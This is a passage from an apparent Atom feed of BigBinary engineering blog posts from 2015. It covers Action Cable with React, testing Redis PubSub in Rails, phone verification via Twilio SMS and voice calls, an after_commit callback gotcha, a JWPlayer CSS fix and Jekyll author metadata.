'sprockets-es6'</code></pre><h2>Step 2 - Add required JavaScript files</h2><p>Follow <a href="https://github.com/reactjs/react-rails#installation">react-rails installation</a> and run <code>rails g react:install</code>.</p><p>This will</p><ul><li>create a components.js file.</li><li>create <code>app/assets/javascripts/components/</code> directory.</li></ul><p>Now put following lines in your application.js:</p><pre><code class="language-javascript">//= require react//= require react_ujs//= require components</code></pre><p>Make sure your <code>app/assets/javascripts/application.js</code> looks like this</p><pre><code class="language-javascript">//= require jquery//= require jquery_ujs//= require turbolinks//= require react//= require react_ujs//= require components//= require cable//= require channels//= require_tree .</code></pre><h2>Step 3 - Setup Action Cable to start listening to events</h2><p>We will be using es6, so lets replace the file <code>app/assets/javascripts/channels/index.coffee</code>, with <code>app/assets/javascripts/channels/index.es6</code> and add following code.</p><pre><code class="language-javascript">var App = {};App.cable = Cable.createConsumer(&quot;ws://localhost:28080&quot;);</code></pre><p>Also remove file <code>app/assets/javascripts/channels/comments.coffee</code>, which is used to setup subscription. We will be doing this setup from our React Component.</p><h2>Step 4 - Create CommentList React Component</h2><p>Add following code to <code>app/assets/javascripts/components/comments_list.js.jsx</code>.</p><pre><code class="language-javascript">var CommentList = React.createClass({  getInitialState() {    let message = JSON.parse(this.props.message);    return { message: message };  },  render() {    let comments = this.state.message.comments.map((comment) =&gt; {      return this.renderComment(comment);    });    return &lt;div&gt;{comments}&lt;/div&gt;;  },  renderComment(comment) {    return (      &lt;article key={comment.id}&gt;        &lt;h3&gt;Comment by {comment.user.name}&lt;/h3&gt;        &lt;p&gt;{comment.content}&lt;/p&gt;      &lt;/article&gt;    );  },});</code></pre><p>Here we have defined a simple component to display a list of comments associated with a message.Message and associated comments are passed as props.</p><h2>Step 5 - Create message JSON builder</h2><p>Next we need to setup data needed to be passed to the component.</p><p>Add following code to <code>app/views/messages/_message.json.jbuilder</code>.</p><pre><code class="language-ruby">json.(message, :created_at, :updated_at, :title, :content, :id)json.comments(message.comments) do |comment|  json.extract! comment, :id, :content  json.user do    json.extract! comment.user, :id, :name  endend</code></pre><p>This would push JSON data to our <code>CommentList</code> component.</p><h3>Step 6 - Create Rails Views to display component</h3><p>We now need to setup our views for Message and display of Comments.</p><p>We need form to create new Comments on messages. This already exists in <code>app/views/comments/_new.html.erb</code> and we will use it as is.</p><pre><code class="language-ruby">&lt;%= form_for [ message, Comment.new ], remote: true do |form| %&gt;  &lt;%= form.text_area :content, size: '100x20' %&gt;&lt;br&gt;  &lt;%= form.submit 'Post comment' %&gt;&lt;% end %&gt;</code></pre><p>After creating comment we need to replace current form with new form, following view takes care of that.</p><p>From the file <code>app/views/comments/create.js.erb</code> <em>delete</em> the linecontaining following code. Please note that below line needs to bedeleted.</p><pre><code class="language-ruby">$('#comments').append('&lt;%=j render @comment %&gt;');</code></pre><p>We need to display the message details and render our component to display comments.Insert following code in <code>app/views/messages/show.html.erb</code> just before <code>&lt;%= render 'comments/comments', message: @message %&gt;</code></p><pre><code class="language-erb">&lt;%= react_component 'CommentList', message: render(partial: 'messages/message.json', locals: {message: @message}) %&gt;</code></pre><p>After inserting the code would look like this.</p><pre><code class="language-ruby">&lt;h1&gt;&lt;%= @message.title %&gt;&lt;/h1&gt;&lt;p&gt;&lt;%= @message.content %&gt;&lt;/p&gt;&lt;%= react_component 'CommentList', message: render(partial: 'messages/message.json', locals: {message: @message}) %&gt;&lt;%= render 'comments/new', message: @message %&gt;</code></pre><p>Notice how we are rendering CommentList, based on Message json content from jbuilder view we created.</p><h2>Step 7 - Setup Subscription to listen to Action Cable from React Component</h2><p>To listen to new updates to comments, we need to setup subscription from Action Cable.</p><p>Add following code to <code>CommentList</code> component.</p><pre><code class="language-javascript">setupSubscription(){  App.comments = App.cable.subscriptions.create(&quot;CommentsChannel&quot;, {    message_id: this.state.message.id,    connected: function () {      setTimeout(() =&gt; this.perform('follow',                                    { message_id: this.message_id}), 1000 );    },    received: function (data) {      this.updateCommentList(data.comment);    },    updateCommentList: this.updateCommentList    });}</code></pre><p>We need to also setup related AC Channel code on Rails end.</p><p>Make following code exists in <code>app/channels/comments_channel.rb</code></p><pre><code class="language-ruby">class CommentsChannel &lt; ApplicationCable::Channel  def follow(data)    stop_all_streams    stream_from &quot;messages:#{data['message_id'].to_i}:comments&quot;  end  def unfollow    stop_all_streams  endend</code></pre><p>In our React Component, we use <code>App.cable.subscriptions.create</code> to create a new subscription for updates, and pass thechannel we want to listen to. It accepts following methods for callbackhooks.</p><ul><li><p><code>connected</code>: Subscription was connected successfully. Here we use <code>perform</code> method to call related action,and pass data to the method. <code>perform('follow', {message_id: this.message_id}), 1000)</code>, calls <code>CommentsChannel#follow(data)</code>.</p></li><li><p><code>received</code>: We received new data notification from Rails. Here we take action to update our Component.We have passed <code>updateCommentList: this.updateCommentList</code>, which is a Component method that is called with data received from Rails.</p></li></ul><h3>Complete React Component</h3><p>Here's how our complete Component looks like.</p><pre><code class="language-javascript">var CommentList = React.createClass({  getInitialState() {    let message = JSON.parse(this.props.message);    return { message: message };  },  render() {    let comments = this.state.message.comments.map((comment) =&gt; {      return this.renderComment(comment);    });    return &lt;div&gt;{comments}&lt;/div&gt;;  },  renderComment(comment) {    return (      &lt;article key={comment.id}&gt;        &lt;h3&gt;Comment by {comment.user.name} &lt;/h3&gt;        &lt;p&gt;{comment.content}&lt;/p&gt;      &lt;/article&gt;    );  },  componentDidMount() {    this.setupSubscription();  },  updateCommentList(comment) {    let message = JSON.parse(comment);    this.setState({ message: message });  },  setupSubscription() {    App.comments = App.cable.subscriptions.create(&quot;CommentsChannel&quot;, {      message_id: this.state.message.id,      connected: function () {        // Timeout here is needed to make sure Subscription        // is setup properly, before we do any actions.        setTimeout(          () =&gt; this.perform(&quot;follow&quot;, { message_id: this.message_id }),          1000        );      },      received: function (data) {        this.updateCommentList(data.comment);      },      updateCommentList: this.updateCommentList,    });  },});</code></pre><h2>Step 7 - Broadcast message when a new comment is created.</h2><p>Our final piece is to broadcast new updates to message to the listeners, that have subscribed to the channel.</p><p>Add following code to <code>app/jobs/message_relay_job.rb</code></p><pre><code class="language-ruby">class MessageRelayJob &lt; ApplicationJob  def perform(message)    comment =  MessagesController.render(partial: 'messages/message',                                         locals: {message: message})    ActionCable.server.broadcast &quot;messages:#{message.id}:comments&quot;,                                 comment: comment  endend</code></pre><p>which is then called from <code>Comment</code> model, like so-</p><p>Add this line to <code>Comment</code> model file <code>app/model/comment.rb</code></p><pre><code class="language-ruby">after_commit { MessageRelayJob.perform_later(self.message) }</code></pre><p>We are using message relay here, and will be getting rid of existing comment relay file - <code>app/jobs/comment_relay_job.rb</code>.We will also remove reference to CommentRelayJob from <code>Comment</code> model, since after_commit it now calls the <code>MessageRelayJob</code>.</p><h2>Summary</h2><p>Hopefully we have shown that Action Cable is going to be a good friendof ReactJS in future. Only time will tell.</p><p>Complete working example for Action Cable + ReactJS can be found <a href="https://github.com/vipulnsward/actioncable-examples/tree/es6">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Verifying PubSub Services from Rails using Redis]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/verifying-pubsub-services-from-rails-redis"/>
      <updated>2015-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/verifying-pubsub-services-from-rails-redis</id>
      <content type="html"><![CDATA[<p>Let's say that we have a Service that reads and writes to Redis.We have <code>BaseRedisService</code> for managing connection,<code>RedisWriterService</code> to write to Redis and<code>RedisReaderService</code> to read from Redis.</p><pre><code class="language-ruby">require 'redis'# Base class to manage connectionclass BaseRedisService REDIS_HOST = '127.0.0.1' def connection   if !(defined?(@@connection) &amp;&amp; @@connection)     @@connection =  Redis.new({ host: REDIS_HOST })   end   @@connection endend</code></pre><pre><code class="language-ruby"># Class to write to Redisclass RedisWriterService &lt;  BaseRedisService attr_reader :key, :value def initialize key, value   @key, @value = key, value end def process   connection.set key, value endend</code></pre><pre><code class="language-ruby"># Class to read from Redisclass RedisReaderService &lt; BaseRedisServiceattr_reader :keydef initialize key  @key = keyenddef process  connection.get keyendend</code></pre><p>A test for the above mentioned case might look like this.</p><pre><code class="language-ruby">require 'test_helper'class RedisPubSubServiceTest &lt; ActiveSupport::TestCasedef test_writing_and_reading_value_using_redis  value = 'Vipul A M'  RedisWriterService.new('name', value).process  assert_equal value, RedisReaderService.new('name').processendend</code></pre><p>But now, we need to add PubSub to the service and verify thatthe service sends proper messages to Redis.For verifying from such a service, the service would need to <code>listen</code> to messages sent to Redis.Problem is that Redis <code>listens</code> in a loop. We would need to explicitly release control from <code>listening</code> andallow our tests to go ahead and verify some scenario.</p><p>Lets look at how these services would look.</p><pre><code class="language-ruby">class RedisPublisherService &lt; BaseRedisServiceattr_reader :options, :channeldef initialize channel, options  @channel     = channel  @options = optionsenddef process  connection.publish(options, channel)endend</code></pre><p>and our <code>Subscriber</code> looks like this.</p><pre><code class="language-ruby">class RedisSubscriberService &lt; BaseRedisServiceattr_reader :channeldef initialize channel  @channel = channelenddef process  connection.subscribe(channel) do |on|    on.message do |channel, message|      puts message    end  endendend</code></pre><p>Notice that we don't have control over returning value from the loop easily. Right now we just print on receiving a new message.</p><p>Now, lets start persisting our messages to some array in our Service.Also we will start exposing this from a thread variable so that it could be accessed from outside of executionof this <code>listen</code> loop.</p><pre><code class="language-ruby">class RedisSubscriberService &lt; BaseRedisServiceattr_reader :channel, :messages, :messages_countdef initialize channel, messages_count = 5  @channel        = channel  @messages       = []  @messages_count = messages_countenddef process  connection.subscribe(channel) do |on|    on.message do |channel, message|      messages.unshift message      Thread.current[:messages] = messages    end  endendend</code></pre><p>We now have a way to access message state from the service to read any messages received by it.Lets say we define a new <code>SubscriberService</code> from a <code>Thread</code>, we could read messages like this.</p><pre><code class="language-ruby">subscriber = Thread.new { RedisSubscriberService.new('payment_alerts').process }# Print first message from messages receivedputs subscriber[:messages].first</code></pre><p>Armed with this, we can now define a set of Rails helpers to use in our Rails tests.</p><pre><code class="language-ruby">module SubscriberHelpersTHREAD_PROCESS_TIMEOUT = 0.5def setup_subscriber channel = 'test_channel'  @subscriber = Thread.new { RedisSubscriberService.new(channel).process }enddef teardown_subscriber  @subscriber.killenddef with_subscriber  yield  @subscriber.join THREAD_PROCESS_TIMEOUTenddef message_from_subscription  @subscriber[:messages].firstendend</code></pre><p>Notice the <code>with_subscriber</code> method. It executes some code passed to it, then passes methodexecution to the subscriber process to read any messages sent and store onto messages store.</p><p>The count of the variable <code>THREAD_PROCESS_TIMEOUT</code>, can be experimented to set to a valuethat suites the system that's being verified.</p><p>In our tests, we can now verify <code>PubSub</code> as-</p><pre><code class="language-ruby">require 'test_helper'class RedisPubSubServiceTest &lt; ActiveSupport::TestCaseinclude SubscriberHelpersdef setup  setup_subscriberenddef teardown  teardown_subscriberenddef test_writing_and_reading_back_values_from_pub_sub  value = 'Vipul A M'  with_subscriber do    RedisPublisherService.new('test_channel', value).process  end  assert_equal value, message_from_subscriptionendend</code></pre><h2>Summary</h2><p>We took a look at how PubSub based services can be verified by using threads and exposingmessages from them, for verification. These can be tailored to support any similar <code>PubSub</code>service like Redis, and can be used to easily verify values being published from our servicesfrom Rails tests.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Voice based phone verification using twilio]]></title>
       <author><name>Santosh Wadghule</name></author>
      <link href="https://www.bigbinary.com/blog/voice-based-phone-verification-using-twilio"/>
      <updated>2015-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/voice-based-phone-verification-using-twilio</id>
      <content type="html"><![CDATA[<p>In my previous <a href="phone-verification-using-twilio">blog post</a>,I talked about how to do phone verification using <strong>SMS</strong> and now in this blog post I'm going to talkabout how to do <strong>voice</strong> based phone verification using <a href="https://github.com/twilio/twilio-ruby">Twilio</a>.</p><h2>Requirement</h2><p>Let's change the requirement a bit this time.</p><ul><li>After the user signs up, send an SMS verification.If SMS verification goes well then use that phone number for future use.</li><li>But if the user's phone number doesn't support the SMS feature, then call on user'sphone number for the verification.</li><li>In the call, ask the user to press <strong>1</strong> from keypad to complete the verification.If that user presses the <strong>1</strong> key, then mark the phone number as verified.</li></ul><h2>Step 1: Make a call for phone verification</h2><p>We already handled SMS verification, so let's add call related changes in<code>PhoneVerificationService</code> class.</p><pre><code class="language-ruby">class PhoneVerificationService  attr_reader :user, :verification_through  VERIFICATION_THROUGH_SMS  = :sms  VERIFICATION_THROUGH_CALL = :call  def initialize options    @user                 = User.find(options[:user_id])    @verification_through = options[:verification_through] || VERIFICATION_THROUGH_SMS  end  def process    if verification_through == VERIFICATION_THROUGH_SMS      perform_sms_verification    else      make_call    end  end  private  def from    #phone number given by twilio    Settings.twilio_number_for_app  end  def to    &quot;+1#{user.phone_number}&quot;  end  def body    &quot;Please reply with this code '#{user.phone_verification_code}'&quot; &lt;&lt;    &quot;to verify your phone number&quot;  end  def send_sms    Rails.logger.info &quot;SMS: From: #{from} To: #{to} Body: \&quot;#{body}\&quot;&quot;    twilio_client.account.messages.create ( from: from, to: to, body: body)  end  def make_call    Rails.logger.info &quot;Call: From: #{from} To: #{to}&quot;    twilio_client.account.calls.create( from: from, to: to, url: callback_url)  end  def perform_sms_verification    begin      send_sms    rescue Twilio::REST::RequestError =&gt; e      return make_call if e.message.include?('is not a mobile number')      raise e.message    end  end  def callback_url    Rails.application.routes.url_helpers      .phone_verifications_voice_url(host: Settings.app_host,                                     verification_code: user.phone_verification_code)  end  def twilio_client    @twilio ||= Twilio::REST::Client.new(Settings.twilio_account_sid,                                         Settings.twilio_auth_token)  endend</code></pre><p>In <code>PhoneVerificationService</code> class we have added some major changes:</p><ol><li>We have defined one more attribute reader <code>verification_through</code> and in <code>initialize</code> methodwe have set it.</li><li>We have created two new constants <code>VERIFICATION_THROUGH_SMS</code> &amp; <code>VERIFICATION_THROUGH_CALL</code>.</li><li>We have changed <code>process</code> method and now we check which verification process shouldbe taken place based on <code>verification_through</code> attribute.</li><li>We also have added new methods <code>perform_sms_verification</code>, <code>make_call</code> and <code>callback_url</code>.</li></ol><p>Let's go through these newly added methods.</p><h2>perform_sms_verification:</h2><p>In this method, first we try to send an SMS verification. If SMS verificationfails with error message like <strong><em>'is not a mobile number'</em></strong> then inthe rescue block, we make a phone verification call or we raise the error.</p><h2>make_call:</h2><p>In this method, we create an actual phone call and pass the all required info totwilio client object.</p><h2>callback_url:</h2><p>In this method, we set the callback_url which isrequired for Twilio for making a call. When we call the user forverification, our app needs to behave like a human and should ask to the user topress 1 to complete the verification (i.e. In the form of <a href="http://www.twilio.com/docs/api/twiml/">TwiML</a>).This <code>callback_url</code> needs be to set in our app.</p><h2>Step 2: Add voice action in phone verification controller</h2><p>For <code>callback_url</code>, add route for <code>voice</code> action in <code>config/routes.rb</code></p><pre><code class="language-plaintext">post 'phone_verifications/voice' =&gt; 'phone_verifications#voice'</code></pre><p>Add <code>voice</code> action and required code for it in <code>PhoneVerificationsController</code>.</p><pre><code class="language-ruby">class PhoneVerificationsController &lt; ApplicationController  skip_before_filter :verify_authenticity_token  after_filter :set_header  HUMAN_VOICE = 'alice'  def voice    verification_code = params[:verification_code]    response = Twilio::TwiML::Response.new do |r|      r.Gather numDigits: '1',               action: &quot;/phone_verifications/verify_from_voice?verification_code=#{verification_code}&quot;,               method: 'post' do |g|        g.Say 'Press 1 to verify your phone number.', voice: HUMAN_VOICE      end    end    render_twiml response  end  def verify_from_message    user = get_user_for_phone_verification    user.mark_phone_as_verified! if user    render nothing: true  end  private  def get_user_for_phone_verification    phone_verification_code = params['Body'].try(:strip)    phone_number            = params['From'].gsub('+1', '')    condition = { phone_verification_code: phone_verification_code,                  phone_number: phone_number }    User.unverified_phones.where(condition).first  end  def set_header    response.headers[&quot;Content-Type&quot;] = &quot;text/xml&quot;  end  def render_twiml(response)    render text: response.text  endend</code></pre><p>In this <code>voice</code> method, we have set up the Twilio response. When a call is made tothe user, this response will get converted into robotic human voice. <code>render_twiml</code>method which sets twilio response intext form is required for Twilio APIs. Set up the response header in the<code>set_header</code> method which gets called in <code>after_filter</code> method.</p><h2>Step 3: Set request URL for voice phone verification in Twilio</h2><p>In <code>voice</code> action method, we have setup the request url in the <code>action</code> key of Twilioresponse object, that also needs to be set in your Twilio account. So when, user repliesback to the call query, Twilio will make a request to our app and adds its own some valuesas parameters to the request. Using those parameters we handle the actual phoneverification in the app.</p><p>Open twilio account and under <strong>NUMBERS</strong> section/tab, click on your Twilio number.Then in Voice section, add request URL with HTTP POST method. Add URL like this.</p><p><code>http://your.ngrok.com/phone_verifications/verify_from_voice/</code></p><p>We need <a href="https://ngrok.com">Ngrok</a> to expose local url to external world.Read more about it in my previous <a href="phone-verification-using-twilio">blog post</a>.</p><h3>Step 4: Add verify_from_voice action in phone verification controller</h3><p>First add route for this action in <code>config/routes.rb</code></p><pre><code class="language-plaintext">post &quot;phone_verifications/verify_from_voice&quot; =&gt; &quot;phone_verifications#verify_from_voice</code></pre><p>Add this method, in your <code>PhoneVerificationsController</code>.</p><pre><code class="language-ruby">  def verify_from_voice    response = Twilio::TwiML::Response.new do |r|      if params['Digits'] == &quot;1&quot;        user = get_user_for_phone_verification        user.mark_phone_as_verified!        r.Say 'Thank you. Your phone number has been verified successfully.',               voice: HUMAN_VOICE      else        r.Say 'Sorry. Your phone number has not verified.',               voice: HUMAN_VOICE      end    end    render_twiml response  end</code></pre><p>Modify private method <code>get_user_for_phone_verification</code> to support voice verificationin <code>PhoneVerificationsController</code>.</p><pre><code class="language-ruby">  def get_user_for_phone_verification    if params['Called'].present?      phone_verification_code = params['verification_code']      phone_number            = params['To']    else      phone_verification_code = params['Body'].try(:strip)      phone_number            = params['From']    end    condition = { phone_verification_code: phone_verification_code,                  phone_number: phone_number.gsub('+1', '') }    User.unverified_phones.where(condition).first  end</code></pre><p>In the <code>verify_from_voice</code> method, we get parameters <code>Digits</code>, <code>To</code> &amp; <code>verification_code</code>from Twilio request. Using these parameters, we search for user in the database. If we get theproper user then we mark user's phone number as verified phone number.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Gotcha with after_commit callback in Rails]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/gotcha-with-after_commit-callback-in-rails"/>
      <updated>2015-03-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/gotcha-with-after_commit-callback-in-rails</id>
      <content type="html"><![CDATA[<p><code>after_commit</code> callback in Rails is triggeredafter the end of transaction.</p><p>For eg. I have a Post modelfor whichthe number of linesof the contentare calculated in the <code>after_commit</code> callback:</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base  after_commit :calculate_total_lines, if: -&gt; (post) { post.previous_changes.include?(:content) }  def calculate_total_lines    update! total_lines: content.split(&quot;\n&quot;).length  endend</code></pre><pre><code class="language-ruby">post = Post.create! content: &quot;Lets discuss Rails 5.\n&quot;, author: 'Prathamesh'assert_equal 1, post.total_lines</code></pre><p>Now lets wrap the creation of post inside a transaction block:</p><pre><code class="language-ruby">Post.transaction do  post = Post.create! content: &quot;Lets discuss Rails 5.\n&quot;, author: 'Prathamesh'  assert_equal 1, post.total_linesend</code></pre><p>The test will fail now.</p><pre><code class="language-ruby">#   1) Failure:# BugTest#test_within_transaction [after_commit_test.rb:45]:# Expected: 1#   Actual: nil</code></pre><p>Why? Lets recall. <code>after_commit</code> callback will get executedafter the end of transaction.</p><p>So until all the code inside transaction is completed,the callback is not going to get executed.</p><p>Here is a <a href="https://gist.github.com/prathamesh-sonpatki/69b00155d3990e3e507e">gist</a>with complete test.</p><p>Next time you are using an <code>after_commit</code> callback and a <code>transaction</code>,make sure that code inside the transaction is not dependent on theresult of the callback.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Blue border around JWPLAYER video]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/blue-border-around-jwplayer-video"/>
      <updated>2015-02-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/blue-border-around-jwplayer-video</id>
      <content type="html"><![CDATA[<p>Latest versions of JWPlayer(6.9 onwards)adds blue border around the videowhen it is in focus.</p><p>This is because of the CSS class <code>jwplayer-tab-focus</code>.</p><p>The blue borderaround currently selected videoallows to identifywhich instance of JWPlayer is in focus.</p><p>But with a single JWPlayer instance, it can be annoying.</p><p>To remove this blue border,we can override the default JWPlayer CSS as follows.</p><pre><code class="language-css">.jw-tab-focus:focus {  outline: none;}</code></pre><p>To keep all the overridden CSS in once place,we can add this change in a separate file such as <code>jwplayer_overrides.css</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Phone verification using SMS via Twilio]]></title>
       <author><name>Santosh Wadghule</name></author>
      <link href="https://www.bigbinary.com/blog/phone-verification-using-twilio"/>
      <updated>2015-01-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/phone-verification-using-twilio</id>
      <content type="html"><![CDATA[<p>In this blog post, I'm going to show you how to do phone verification using SMS via Twilio.We will be using <a href="https://github.com/twilio/twilio-ruby">Twilio</a> gem.</p><h2>Requirement</h2><ul><li>When a user signs up , we want to send an SMS to that userwith a random string to verify user's phone number.</li><li>If that user replies back with that code, then verify user's phone numberin the app. Once the phone number is verified, then we can use that phone numberfor future use.</li></ul><h2>Step 1: Create required columns in users table</h2><p>Let's create <code>phone_number</code>, <code>phone_verification_code</code> and <code>phone_verified</code>columns in the users table.</p><pre><code class="language-plaintext"> $ bin/rails generate migration AddPhoneAttributesToUsers phone_number:string phone_verification_code:string phone_verified:boolean</code></pre><p>Then run the migration.</p><h2>Step 2: Add phone number field in registration form</h2><p>Add <code>phone_number</code> field in the registration form.</p><pre><code class="language-plaintext">  &lt;%= f.text_field :phone_number %&gt;</code></pre><h2>Step 3: Send an SMS with verification code</h2><p>When a user submits registration form, we need to send SMS ifphone number is present. To handle this, add following code in <code>User</code>model.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  scope :unverified_phones,  -&gt; { where(phone_verified: false) }  before_save :set_phone_attributes, if: :phone_verification_needed?  after_save :send_sms_for_phone_verification, if: :phone_verification_needed?  def mark_phone_as_verified!    update!(phone_verified: true, phone_verification_code: nil)  end  private  def set_phone_attributes    self.phone_verified = false    self.phone_verification_code = generate_phone_verification_code    # removes all white spaces, hyphens, and parenthesis    self.phone_number.gsub!(/[\s\-\(\)]+/, '')  end  def send_sms_for_phone_verification    PhoneVerificationService.new(user_id: id).process  end  def generate_phone_verification_code    begin     verification_code = SecureRandom.hex(3)    end while self.class.exists?(phone_verification_code: verification_code)    verification_code  end  def phone_verification_needed?    phone_number.present? &amp;&amp; phone_number_changed?  endend</code></pre><p>We have added 2 major changes in the user model,</p><ul><li><code>set_phone_attributes</code> method is set in <code>before_save</code> callback.</li><li><code>send_sms_for_phone_verification</code> method is set in <code>after_save</code> callback.</li></ul><p>In <code>set_phone_attributes</code> method, we are setting up the phone attributes mainlysanitizing phone number and generating unique phone verification code. In<code>send_sms_for_phone_verification</code> method, we send SMS to the user. Creation ofSMS for the phone verification message is handled in <code>PhoneVerificationService</code>class.</p><pre><code class="language-ruby">class PhoneVerificationService  attr_reader :user  def initialize(options)    @user = User.find(options[:user_id])  end  def process    send_sms  end  private  def from    # Add your twilio phone number (programmable phone number)    Settings.twilio_number_for_app  end  def to    # +1 is a country code for USA    &quot;+1#{user.phone_number}&quot;  end  def body    &quot;Please reply with this code '#{user.phone_verification_code}' to    verify your phone number&quot;  end  def twilio_client    # Pass your twilio account SID and auth token    @twilio ||= Twilio::REST::Client.new(Settings.twilio_account_sid,                                         Settings.twilio_auth_token)  end  def send_sms    Rails.logger.info &quot;SMS: From: #{from} To: #{to} Body: \&quot;#{body}\&quot;&quot;    twilio_client.account.messages.create(      from: from,      to: to,      body: body    )  endend</code></pre><p>In <code>PhoneVerificationService</code> class, we have defined <code>user</code> as an attribute readerand in <code>initialize</code> method, we have set the user object to it. Now if you see <code>process</code>method, it does lots of stuff for us.</p><p>Lets go through each method.</p><ul><li><code>from</code> - In this method, we set up the twilio phone number e.g.programmable number.</li><li><code>to</code> - In this method, we set the phone number to which we want to sendan SMS.</li><li><code>body</code> - In this method, we build text message with verification code.</li><li><code>twilio_client</code> - It creates twilio client based on twilio account SID and auth token.</li><li><code>send_sms</code> - And last, it sends SMS to the user.</li></ul><h2>Step 4: Set request URL for phone verification in Twilio</h2><p>As of now the system has the capability to send SMS to a user.Now we need to add capability to receive the SMS and to matchthe verification code.</p><p>First, we need to set up a request URL in Twilio account.</p><p>Open twilio account and under <strong>NUMBERS</strong> section/tab, click on your Twilio number.Then in <strong>Messaging</strong> section, add request URL with <strong>HTTP POST</strong> method. Add URL like this.</p><pre><code class="language-plaintext">http://your.ngrok.com/phone_verifications/verify_from_message/</code></pre><p>But to make it work, we need our Rails app on the public internet. There are twooptions for this:</p><ol><li>Deploy Rails app to your VPS or PaaS of choice.</li><li>Use a tunneling service to take the server running on your development machine andmake it available at an address on the public internet.</li></ol><p>I'm going to use <a href="https://ngrok.com/">Ngrok</a> tunneling service for the purpose of this blog.You can check this <a href="https://www.twilio.com/blog/2013/10/test-your-webhooks-locally-with-ngrok.html">blog</a>for more about its usage.</p><h2>Step 5: Create phone verification controller</h2><p>We need one more controller, which will handle phone verification when requestcomes from Twilio. When a user replies back with a verification code, it willtrigger request URL through Twilio API. To handle that request, let's add phoneverifications controller.</p><pre><code class="language-plaintext">  $ bin/rails generate controller phone_verifications</code></pre><p>Add new route in <code>config/routes.rb</code></p><pre><code class="language-plaintext">post &quot;phone_verifications/verify_from_message&quot; =&gt; &quot;phone_verifications#verify_from_message&quot;</code></pre><p>Add following code to the <code>PhoneVerificationsController</code>.</p><pre><code class="language-ruby">class PhoneVerificationsController &lt; ApplicationController  skip_before_action :verify_authenticity_token  def verify_from_message    user = get_user_for_phone_verification    user.mark_phone_as_verified! if user    render nothing: true  end  private  def get_user_for_phone_verification    phone_verification_code = params['Body'].try(:strip)    phone_number            = params['From'].gsub('+1', '')    condition = { phone_verification_code: phone_verification_code,                  phone_number: phone_number }    User.unverified_phones.where(condition).first  endend</code></pre><p>In this controller, we added <code>skip_before_action :verify_authenticity_token</code>,this is because we need to allow twilio request in our Rails app which isactually an outside request (e.g. not secured request). This means we havedisabled CSRF detection for this controller.</p><p>Now look at the <code>verify_from_message</code> method, in this method we take phone verificationcode and phone number from params hash. Using those data, we find the user from the database.Once we get the user, then we mark user's phone number as a verified phone number.</p><p>Finally we are set to send business level text messages to the verified phone number.</p><p>This <a href="https://www.twilio.com/blog/2014/10/twilio-on-rails-part-2-rails-4-app-sending-sms-mms.html">blog</a>has more informationabout how to make secure twilio requests.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Author information in jekyll blog]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/author-information-in-jekyll-blog"/>
      <updated>2015-01-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/author-information-in-jekyll-blog</id>
      <content type="html"><![CDATA[<p>BigBinary's <a href="https://bigbinary.com/blog">blog</a> is powered by<a href="http://jekyllrb.com">jekyll</a>. In every blog we display author's name, author'stwitter handle, author's github id and author's avatar. In this blog I'm goingto discuss how we collect all that information in a simple manner.</p><p>We create a directory called <strong>_data</strong> in the root folder. This directory has asingle file called <strong>authors.yml</strong> which in our case looks like this.</p><pre><code class="language-plaintext">vipulnsward:  name: Vipul  avatar: http://bigbinary.com/assets/team/vipul.jpg  github: vipulnsward  twitter: vipulnswardneerajsingh0101:  name: Neeraj Singh  avatar: http://bigbinary.com/assets/team/neeraj.jpg  github: neerajsingh0101  twitter: neerajsingh0101</code></pre><p>We do not need to do anything to load <strong>authors.yml</strong> . It is automaticallyloaded by jekyll.</p><p>When we create a blog then the top of the blog looks like this.</p><pre><code class="language-plaintext">---layout: posttitle: How to deploy jekyll site to herokucategories: [Ruby]author_github: neerajsingh0101---</code></pre><p>Notice the last line where we have put in the author's github id. That's theidentifier we use to pull in author's information.</p><p>In order to display author's name we have following code in the layout.</p><pre><code class="language-plaintext">{% raw %}&lt;span class=&quot;author-name&quot;&gt;  {{ site.data.authors[page.author_github].name }}&lt;/span&gt;{% endraw %}</code></pre><p>Similarly to display author's twitter handle and github id we have followingcode.</p><pre><code class="language-plaintext">{% raw %}&lt;a href=&quot;www.twitter.com/{{site.data.authors[page.author_github].twitter}}&quot;&gt;  &lt;i class=&quot;ico-twitter&quot;&gt;&lt;/i&gt;&lt;/a&gt;&lt;a href=&quot;www.github.com/{{site.data.authors[page.author_github].github}}&quot;&gt;  &lt;i class=&quot;ico-github&quot;&gt;&lt;/i&gt;&lt;/a&gt;{% endraw %}</code></pre><p>Now the blog will display the author information and all this information isnicely centralized in one single file.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Obtain current timezone in Selenium IDE using JS]]></title>
       <author><name>Prabhakar Battula</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript"/>
      <updated>2015-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript</id>
